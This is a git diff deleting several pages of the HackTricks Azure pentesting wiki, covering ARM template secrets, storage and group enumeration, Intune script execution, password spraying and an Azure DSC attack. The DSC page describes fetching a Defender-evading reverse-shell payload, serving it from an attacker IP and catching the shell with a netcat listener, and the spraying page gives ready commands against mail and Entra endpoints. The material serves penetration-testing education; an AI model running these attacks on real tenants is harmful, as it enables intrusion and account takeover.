- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/pentesting-cloud/azure-security/az-services/az-arm-templates.md deleted file mode 100644 index b594c6aa7..000000000 --- a/pentesting-cloud/azure-security/az-services/az-arm-templates.md +++ /dev/null @@ -1,57 +0,0 @@ -# Az - ARM Templates / Deployments - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) To implement **infrastructure as code for your Azure solutions**, use Azure Resource Manager templates (ARM templates). The template is a JavaScript Object Notation (**JSON**) file that **defines** the **infrastructure** and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources. - -### History - -If you can access it, you can have **info about resources** that are not present but might be deployed in the future. Moreover, if a **parameter** containing **sensitive info** was marked as "**String**" **instead** of "**SecureString**", it will be present in **clear-text**. - -## Search Sensitive Info - -Users with the permissions `Microsoft.Resources/deployments/read` and `Microsoft.Resources/subscriptions/resourceGroups/read` can **read the deployment history**. - -```powershell -Get-AzResourceGroup -Get-AzResourceGroupDeployment -ResourceGroupName - -# Export -Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName -cat .json # search for hardcoded password -cat | Select-String password -``` - -## References - -* [https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/\~/changes/argKsv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-services/az-arm-templates#references](az-arm-templates.md#references) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md b/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md deleted file mode 100644 index 5f6a84345..000000000 --- a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md +++ /dev/null @@ -1,91 +0,0 @@ -# Az - State Configuration RCE - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check the complete post in:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe) - -### Summary of Remote Server (C2) Infrastructure Preparation and Steps - -#### Overview - -The process involves setting up a remote server infrastructure to host a modified Nishang `Invoke-PowerShellTcp.ps1` payload, named `RevPS.ps1`, designed to bypass Windows Defender. The payload is served from a Kali Linux machine with IP `40.84.7.74` using a simple Python HTTP server. The operation is executed through several steps: - -#### Step 1 — Create Files - -* **Files Required:** Two PowerShell scripts are needed: - 1. `reverse_shell_config.ps1`: A Desired State Configuration (DSC) file that fetches and executes the payload. It is obtainable from [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1). - 2. `push_reverse_shell_config.ps1`: A script to publish the configuration to the VM, available at [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1). -* **Customization:** Variables and parameters in these files must be tailored to the user's specific environment, including resource names, file paths, and server/payload identifiers. - -#### Step 2 — Zip Configuration File - -* The `reverse_shell_config.ps1` is compressed into a `.zip` file, making it ready for transfer to the Azure Storage Account. - -```powershell -Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip -``` - -#### Step 3 — Set Storage Context & Upload - -* The zipped configuration file is uploaded to a predefined Azure Storage container, azure-pentest, using Azure's Set-AzStorageBlobContent cmdlet. 
- -```powershell -Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx -``` - -#### Step 4 — Prep Kali Box - -* The Kali server downloads the RevPS.ps1 payload from a GitHub repository. - -```bash -wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1 -``` - -* The script is edited to specify the target Windows VM and port for the reverse shell. - -#### Step 5 — Publish Configuration File - -* The configuration file is executed, resulting in the reverse-shell script being deployed to the specified location on the Windows VM. - -#### Step 6 — Host Payload and Setup Listener - -* A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to capture incoming connections. - -```bash -sudo python -m SimpleHTTPServer 80 -sudo nc -nlvp 443 -``` - -* The scheduled task executes the payload, achieving SYSTEM-level privileges. - -#### Conclusion - -The successful execution of this process opens numerous possibilities for further actions, such as credential dumping or expanding the attack to multiple VMs. The guide encourages continued learning and creativity in the realm of Azure Automation DSC. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md b/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md deleted file mode 100644 index b2479b6bc..000000000 --- a/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md +++ /dev/null @@ -1,86 +0,0 @@ -# Az - Management Groups, Subscriptions & Resource Groups - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Management Groups - -You can find more info about Management Groups in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -```bash -# List -az account management-group list -# Get details and management groups and subscriptions that are children -az account management-group show --name --expand --recurse -``` - -## Subscriptions - -You can find more info about Subscriptions in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -{% code overflow="wrap" %} -```bash -# List all subscriptions -az account list --output table -# Get details -az account management-group subscription show --name --subscription -``` -{% endcode %} - -## Resource Groups - -You can find more info about Resource Groups in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -{% code overflow="wrap" %} -```bash -# List all resource groups -az group list -# Get resource groups of specific subscription -az group list --subscription "" --output table -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-queue-enum.md b/pentesting-cloud/azure-security/az-services/az-queue-enum.md deleted file mode 100644 index 03b3918bc..000000000 --- a/pentesting-cloud/azure-security/az-services/az-queue-enum.md +++ /dev/null @@ -1,117 +0,0 @@ -# Az - Queue Storage - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Azure Queue Storage is a service in Microsoft's Azure cloud platform designed for message queuing between application components, **enabling asynchronous communication and decoupling**. It allows you to store an unlimited number of messages, each up to 64 KB in size, and supports operations such as creating and deleting queues, adding, retrieving, updating, and deleting messages, as well as managing metadata and access policies. While it typically processes messages in a first-in-first-out (FIFO) manner, strict FIFO is not guaranteed. - -### Enumeration - -{% tabs %} -{% tab title="Az Cli" %} -```bash -# You need to know the --account-name of the storage (az storage account list) -az storage queue list --account-name - -# Queue Metadata -az storage queue metadata show --name --account-name - -#Get ACL -az storage queue policy list --queue-name --account-name - -# Get Messages (getting a message deletes it) -az storage message get --queue-name --account-name - -# Peek Messages -az storage message peek --queue-name --account-name -``` -{% endtab %} - -{% tab title="Az PS" %} -```bash -# Get the Storage Context -$storageAccount = Get-AzStorageAccount -ResourceGroupName QueueResourceGroup -Name queuestorageaccount1994 -$ctx = $storageAccount.Context - -# Set Variables for Storage Account -$storageAccountName = "queuestorageaccount" - -# List Queues -Get-AzStorageQueue -Context $context -$queueName = "myqueue" - -# Retrieve a specific queue -$queue = Get-AzStorageQueue -Name $queueName -Context $context -$queue # Show the properties of the queue - -# Retrieve the access policies for the queue -$accessPolicies = Get-AzStorageQueueStoredAccessPolicy -Context $context -QueueName $queueName -$accessPolicies - -# Peek Messages -$queueMessage = $queue.QueueClient.PeekMessage() -$queueMessage.Value - -# Set the amount of time you want to entry to be invisible after read from the queue -# If it is not deleted by the end of this time, it 
will show up in the queue again -$visibilityTimeout = [System.TimeSpan]::FromSeconds(10) - -# Read the messages from the queue, then show the contents of the messages. -$queueMessage = $queue.QueueClient.ReceiveMessages(1,$visibilityTimeout) -$queueMessage.Value -``` -{% endtab %} -{% endtabs %} - -### Privilege Escalation - -{% content-ref url="../az-privilege-escalation/az-queue-privesc.md" %} -[az-queue-privesc.md](../az-privilege-escalation/az-queue-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../az-post-exploitation/az-queue-post-exploitation.md" %} -[az-queue-post-exploitation.md](../az-post-exploitation/az-queue-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../az-persistence/az-queue-persistance.md" %} -[az-queue-persistance.md](../az-persistence/az-queue-persistance.md) -{% endcontent-ref %} - -## References - -* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues -* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api -* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-table-storage.md b/pentesting-cloud/azure-security/az-services/az-table-storage.md deleted file mode 100644 index 1b7b3e923..000000000 --- a/pentesting-cloud/azure-security/az-services/az-table-storage.md +++ /dev/null @@ -1,137 +0,0 @@ -# Az - Table Storage - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Azure Table Storage** is a NoSQL key-value store designed for storing large volumes of structured, non-relational data. It offers high availability, low latency, and scalability to handle large datasets efficiently. Data is organized into tables, with each entity identified by a partition key and row key, enabling fast lookups. It supports features like encryption at rest, role-based access control, and shared access signatures for secure, managed storage suitable for a wide range of applications. - -There **isn't built-in backup mechanism** for table storage. - -### Keys - -#### **PartitionKey** - -* The **PartitionKey groups entities into logical partitions**. Entities with the same PartitionKey are stored together, which improves query performance and scalability. -* Example: In a table storing employee data, `PartitionKey` might represent a department, e.g., `"HR"` or `"IT"`. - -#### **RowKey** - -* The **RowKey is the unique identifier** for an entity within a partition. When combined with the PartitionKey, it ensures that each entity in the table has a globally unique identifier. -* Example: For the `"HR"` partition, `RowKey` might be an employee ID, e.g., `"12345"`. - -#### **Other Properties (Custom Properties)** - -* Besides the PartitionKey and RowKey, an entity can have additional **custom properties to store data**. These are user-defined and act like columns in a traditional database. -* Properties are stored as **key-value pairs**. -* Example: `Name`, `Age`, `Title` could be custom properties for an employee. 
- -## Enumeration - -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} -```bash -# Get storage accounts -az storage account list - -# List tables -az storage table list --account-name - -# Read table -az storage entity query \ - --account-name \ - --table-name \ - --top 10 - -# Write table -az storage entity insert \ - --account-name \ - --table-name \ - --entity PartitionKey= RowKey= = - -# Write example -az storage entity insert \ - --account-name mystorageaccount \ - --table-name mytable \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" - -# Update row -az storage entity merge \ - --account-name mystorageaccount \ - --table-name mytable \ - --entity PartitionKey=pk1 RowKey=rk1 Age=31 -``` -{% endcode %} -{% endtab %} -{% tab title="PowerShell" %} -{% code overflow="wrap" %} -```powershell -# Get storage accounts -Get-AzStorageAccount - -# List tables -Get-AzStorageTable -Context (Get-AzStorageAccount -Name -ResourceGroupName ).Context -``` -{% endcode %} -{% endtab %} -{% endtabs %} - -{% hint style="info" %} -By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login`. 
-{% endhint %} - -{% hint style="success" %} -Use the param `--account-key` to indicate the account key to use\ -Use the param `--sas-token` with the SAS token to access via a SAS token -{% endhint %} - -## Privilege Escalation - -Same as storage privesc: - -{% content-ref url="../az-privilege-escalation/az-storage-privesc.md" %} -[az-storage-privesc.md](../az-privilege-escalation/az-storage-privesc.md) -{% endcontent-ref %} - -## Post Exploitation - -{% content-ref url="../az-post-exploitation/az-table-storage-post-exploitation.md" %} -[az-table-storage-post-exploitation.md](../az-post-exploitation/az-table-storage-post-exploitation.md) -{% endcontent-ref %} - -## Persistence - -Same as storage persistence: - -{% content-ref url="../az-persistence/az-storage-persistence.md" %} -[az-storage-persistence.md](../az-persistence/az-storage-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/intune.md b/pentesting-cloud/azure-security/az-services/intune.md deleted file mode 100644 index 1c5274e15..000000000 --- a/pentesting-cloud/azure-security/az-services/intune.md +++ /dev/null @@ -1,57 +0,0 @@ -# Az - Intune - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Microsoft Intune is designed to streamline the process of **app and device management**. Its capabilities extend across a diverse range of devices, encompassing mobile devices, desktop computers, and virtual endpoints. The core functionality of Intune revolves around **managing user access and simplifying the administration of applications** and devices within an organization's network. - -## Cloud -> On-Prem - -A user with **Global Administrator** or **Intune Administrator** role can execute **PowerShell** scripts on any **enrolled Windows** device.\ -The **script** runs with **privileges** of **SYSTEM** on the device only once if it doesn't change, and from Intune it's **not possible to see the output** of the script. - -```powershell -Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'" -``` - -1. Login into [https://endpoint.microsoft.com/#home](https://endpoint.microsoft.com/#home) or use Pass-The-PRT -2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune -3. Go to **Scripts** and click on **Add** for Windows 10. -4. Add a **Powershell script** - * ![](<../../../.gitbook/assets/image (264).png>) -5. Specify **Add all users** and **Add all devices** in the **Assignments** page. - -The execution of the script can take up to **one hour**. - -## References - -* [https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune](https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md deleted file mode 100644 index b48b2dcea..000000000 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Device Code Authentication Phishing - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check:** [**https://o365blog.com/post/phishing/**](https://o365blog.com/post/phishing/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md deleted file mode 100644 index 2ffc070e9..000000000 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md +++ /dev/null @@ -1,61 +0,0 @@ -# Az - Password Spraying - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Password Spray - -In **Azure** this can be done against **different API endpoints** like Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc. - -However, note that this technique is **very noisy** and Blue Team can **easily catch it**. Moreover, **forced password complexity** and the use of **MFA** can make this technique kind of useless. - -You can perform a password spray attack with [**MSOLSpray**](https://github.com/dafthack/MSOLSpray) - -```powershell -. .\MSOLSpray\MSOLSpray.ps1 -Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose -``` - -Or with [**o365spray**](https://github.com/0xZDH/o365spray) - -```bash -python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com -``` - -Or with [**MailSniper**](https://github.com/dafthack/MailSniper) - -```powershell -#OWA -Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt -#EWS -Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt -#Gmail -Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md deleted file mode 100644 index 2d7ddc48f..000000000 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md +++ /dev/null @@ -1,69 +0,0 @@ -# Az - VMs Unath - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
